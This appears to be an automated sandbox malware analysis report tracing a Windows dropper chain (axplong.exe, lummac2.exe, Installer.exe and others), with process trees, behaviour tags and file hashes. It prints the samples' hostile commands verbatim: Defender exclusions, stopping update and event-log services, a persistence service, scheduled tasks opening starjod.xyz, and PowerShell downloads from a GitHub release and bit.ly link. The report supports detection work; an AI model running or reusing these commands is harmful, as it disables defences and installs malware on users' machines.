PID 3668 wrote to memory of 2388	3668	axplong.exe	gold.exe
PID 3668 wrote to memory of 2388	3668	axplong.exe	gold.exe
PID 3668 wrote to memory of 2388	3668	axplong.exe	gold.exe
PID 2388 wrote to memory of 4884	2388	gold.exe	RegAsm.exe
PID 2388 wrote to memory of 4884	2388	gold.exe	RegAsm.exe
PID 2388 wrote to memory of 4884	2388	gold.exe	RegAsm.exe
PID 2388 wrote to memory of 4884	2388	gold.exe	RegAsm.exe
PID 2388 wrote to memory of 4884	2388	gold.exe	RegAsm.exe
PID 2388 wrote to memory of 4884	2388	gold.exe	RegAsm.exe
PID 2388 wrote to memory of 4884	2388	gold.exe	RegAsm.exe
PID 2388 wrote to memory of 4884	2388	gold.exe	RegAsm.exe
PID 3668 wrote to memory of 2072	3668	axplong.exe	lummac2.exe
PID 3668 wrote to memory of 2072	3668	axplong.exe	lummac2.exe
PID 3668 wrote to memory of 2072	3668	axplong.exe	lummac2.exe
PID 3668 wrote to memory of 4152	3668	axplong.exe	NewLatest.exe
PID 3668 wrote to memory of 4152	3668	axplong.exe	NewLatest.exe
PID 3668 wrote to memory of 4152	3668	axplong.exe	NewLatest.exe
PID 4152 wrote to memory of 3420	4152	NewLatest.exe	Hkbsse.exe
PID 4152 wrote to memory of 3420	4152	NewLatest.exe	Hkbsse.exe
PID 4152 wrote to memory of 3420	4152	NewLatest.exe	Hkbsse.exe
PID 3668 wrote to memory of 884	3668	axplong.exe	Installer.exe
PID 3668 wrote to memory of 884	3668	axplong.exe	Installer.exe
PID 884 wrote to memory of 3048	884	Installer.exe	cmd.exe
PID 884 wrote to memory of 3048	884	Installer.exe	cmd.exe
PID 3048 wrote to memory of 3932	3048	cmd.exe	schtasks.exe
PID 3048 wrote to memory of 3932	3048	cmd.exe	schtasks.exe
PID 3048 wrote to memory of 2560	3048	cmd.exe	schtasks.exe
PID 3048 wrote to memory of 2560	3048	cmd.exe	schtasks.exe
PID 3048 wrote to memory of 3648	3048	cmd.exe	powershell.exe
PID 3048 wrote to memory of 3648	3048	cmd.exe	powershell.exe
PID 3420 wrote to memory of 2752	3420	Hkbsse.exe	1.exe
PID 3420 wrote to memory of 2752	3420	Hkbsse.exe	1.exe
PID 3420 wrote to memory of 2752	3420	Hkbsse.exe	1.exe
PID 3048 wrote to memory of 400	3048	cmd.exe	powershell.exe
PID 3048 wrote to memory of 400	3048	cmd.exe	powershell.exe
PID 400 wrote to memory of 2864	400	powershell.exe	cmd.exe
PID 400 wrote to memory of 2864	400	powershell.exe	cmd.exe
PID 3048 wrote to memory of 2528	3048	cmd.exe	powershell.exe
PID 3048 wrote to memory of 2528	3048	cmd.exe	powershell.exe
PID 2864 wrote to memory of 5040	2864	cmd.exe	schtasks.exe
PID 2864 wrote to memory of 5040	2864	cmd.exe	schtasks.exe
PID 2864 wrote to memory of 2492	2864	cmd.exe	reg.exe
PID 2864 wrote to memory of 2492	2864	cmd.exe	reg.exe
PID 2864 wrote to memory of 5000	2864	cmd.exe	schtasks.exe
PID 2864 wrote to memory of 5000	2864	cmd.exe	schtasks.exe
PID 2864 wrote to memory of 3864	2864	cmd.exe	schtasks.exe
PID 2864 wrote to memory of 3864	2864	cmd.exe	schtasks.exe
PID 3668 wrote to memory of 3748	3668	axplong.exe	legs.exe
PID 3668 wrote to memory of 3748	3668	axplong.exe	legs.exe
PID 3668 wrote to memory of 3748	3668	axplong.exe	legs.exe
PID 3748 wrote to memory of 3128	3748	legs.exe	RegAsm.exe
PID 3748 wrote to memory of 3128	3748	legs.exe	RegAsm.exe
PID 3748 wrote to memory of 3128	3748	legs.exe	RegAsm.exe
PID 3748 wrote to memory of 3128	3748	legs.exe	RegAsm.exe
PID 3748 wrote to memory of 3128	3748	legs.exe	RegAsm.exe
PID 3748 wrote to memory of 3128	3748	legs.exe	RegAsm.exe
PID 3748 wrote to memory of 3128	3748	legs.exe	RegAsm.exe
PID 3748 wrote to memory of 3128	3748	legs.exe	RegAsm.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe
"C:\Users\Admin\AppData\Local\Temp\79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3468

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3668

C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe
"C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3136

C:\Users\Admin\AppData\Local\Temp\6.exe
"C:\Users\Admin\AppData\Local\Temp\6.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:992

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.co/1lLub
4⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2136

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=125.0.6422.142 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=125.0.2535.92 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x360,0x7ff8e1bf4ef8,0x7ff8e1bf4f04,0x7ff8e1bf4f10
5⤵
PID:432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2680,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=2676 /prefetch:2
5⤵
PID:1892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=1912,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=2896 /prefetch:3
5⤵
PID:4608

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --field-trial-handle=2156,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=2936 /prefetch:8
5⤵
PID:2584

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3428,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=3464 /prefetch:1
5⤵
PID:2788

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3440,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=3492 /prefetch:1
5⤵
PID:3100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3756,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=4044 /prefetch:1
5⤵
PID:4000

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=5236,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=4308 /prefetch:1
5⤵
PID:3952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5056,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=3524 /prefetch:8
5⤵
PID:3452

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --field-trial-handle=3424,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=3552 /prefetch:8
5⤵
PID:2036

C:\Program Files (x86)\Microsoft\Edge\Application\125.0.2535.92\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\125.0.2535.92\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --field-trial-handle=5972,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=5992 /prefetch:8
5⤵
PID:1020

C:\Program Files (x86)\Microsoft\Edge\Application\125.0.2535.92\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\125.0.2535.92\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --field-trial-handle=5972,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=5992 /prefetch:8
5⤵
PID:4364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --field-trial-handle=5988,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=6400 /prefetch:8
5⤵
PID:5284

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --field-trial-handle=6404,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=6412 /prefetch:8
5⤵
PID:5236

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=6296,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=6428 /prefetch:8
5⤵
PID:5280

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --field-trial-handle=6048,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=5636 /prefetch:8
5⤵
PID:5832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=6528,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=5804 /prefetch:8
5⤵
PID:3376

C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2388

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:4884

C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe
"C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"
3⤵
- Executes dropped EXE
PID:2072

C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
"C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4152

C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3420

C:\Users\Admin\AppData\Local\Temp\1000014001\1.exe
"C:\Users\Admin\AppData\Local\Temp\1000014001\1.exe"
5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:2752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2752 -s 352
6⤵
- Program crash
PID:2528

C:\Users\Admin\AppData\Local\Temp\1000015001\FirstZ.exe
"C:\Users\Admin\AppData\Local\Temp\1000015001\FirstZ.exe"
5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:3152

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
6⤵
PID:5212

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
7⤵
PID:5292

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
6⤵
- Launches sc.exe
PID:5220

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:5300

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
6⤵
- Launches sc.exe
PID:5348

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
6⤵
- Launches sc.exe
PID:5396

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
6⤵
- Launches sc.exe
PID:5440

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
6⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5488

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
6⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5496

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
6⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5504

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
6⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5512

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WSNKISKT"
6⤵
- Launches sc.exe
PID:5520

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
6⤵
- Launches sc.exe
PID:5696

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
6⤵
- Launches sc.exe
PID:5748

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WSNKISKT"
6⤵
- Launches sc.exe
PID:5756

C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe
"C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:884

C:\Windows\SYSTEM32\cmd.exe
cmd /c ins.bat
4⤵
- Suspicious use of WriteProcessMemory
PID:3048

C:\Windows\system32\schtasks.exe
schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
5⤵
- Scheduled Task/Job: Scheduled Task
PID:3932

C:\Windows\system32\schtasks.exe
schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
5⤵
- Scheduled Task/Job: Scheduled Task
PID:2560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3648

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"
5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:400

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\install.bat"
6⤵
- Suspicious use of WriteProcessMemory
PID:2864

C:\Windows\system32\schtasks.exe
schtasks /create /tn "Cleaner" /tr "C:\Users\Admin\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00
7⤵
- Scheduled Task/Job: Scheduled Task
PID:5040

C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
7⤵
- Modifies registry key
PID:2492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
7⤵
- Scheduled Task/Job: Scheduled Task
PID:5000

C:\Windows\system32\schtasks.exe
schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
7⤵
- Scheduled Task/Job: Scheduled Task
PID:3864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\Admin\AppData\Local\Corporation.zip'"
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Corporation.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Corporation'"
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2320

C:\Windows\system32\schtasks.exe
schtasks /query /TN "Cleaner"
5⤵
PID:1020

C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe
"C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3748

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 244
4⤵
- Program crash
PID:4668

C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe
"C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2124

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
4⤵
PID:6052

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4608,i,1305347165619645738,15927664461101562802,262144 --variations-seed-version --mojo-platform-channel-handle=4204 /prefetch:8
1⤵
PID:1152

C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:4740

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2752 -ip 2752
1⤵
PID:3008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 3748 -ip 3748
1⤵
PID:3556

C:\Program Files (x86)\Microsoft\Edge\Application\125.0.2535.92\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\125.0.2535.92\elevation_service.exe"
1⤵
PID:1228

C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5836

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
2⤵
PID:3008

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
3⤵
PID:1020

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
2⤵
- Launches sc.exe
PID:992

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:2288

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
2⤵
- Launches sc.exe
PID:5260

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
2⤵
- Launches sc.exe
PID:5340

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
2⤵
- Launches sc.exe
PID:5216

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5388

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5384

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5380

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5348

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:5364

C:\Windows\explorer.exe
explorer.exe
2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5452

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6000

C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:5860

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Corporation.zip
Filesize
16.3MB

MD5
9cb5edb138b8df3492c0b14b56d617ac

SHA1
b02dfae970d31251d2f94cf14328f757ceb45c98

SHA256
de8c63974461298010c9b9c8a97e769f72f271e976bdbb54dee45264f8a0eda8

SHA512
50306f663098471c9aa51d9024bce4b8a25baec2fab2424909b481a4d223feda5311111831eb9084115686782c0c831f81ef5ccdb32b7a6833ff811ff51d4929

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
280B

MD5
66a163fc723cc32c0075f141523c1285

SHA1
c531ffba997084a5230d2abd8823f980bffd3f53

SHA256
f5b3825db0d8bdd4a1cd696fbaa6b730ad0b9f2cca5ab752a69b4376a33646dd

SHA512
12c3df079dd8f58b907733bcff4d44e90f43e68fc54cefe040300c8027d5b754f197351c012b3b424cb5b9ffd26ade4a8fa645f804d28610526de19dada8bc3f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
312B

MD5
95158738985aabe787398318f7f4d84b

SHA1
06db496771aada0f05fb3603a2a0814ab2e04658

SHA256
572143aab44c638d787ffe98f8d98897b82af6052ef78116e9a470e5fe27230b

SHA512
e3dcd722e08dac7b003cbd0a5264207876b2c35a8af05e776a258ce30cd6db925cc0bb74815dd1ced6619ac496d18c710a489f3d33e4793c1e89741fe7b4a263

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
Filesize
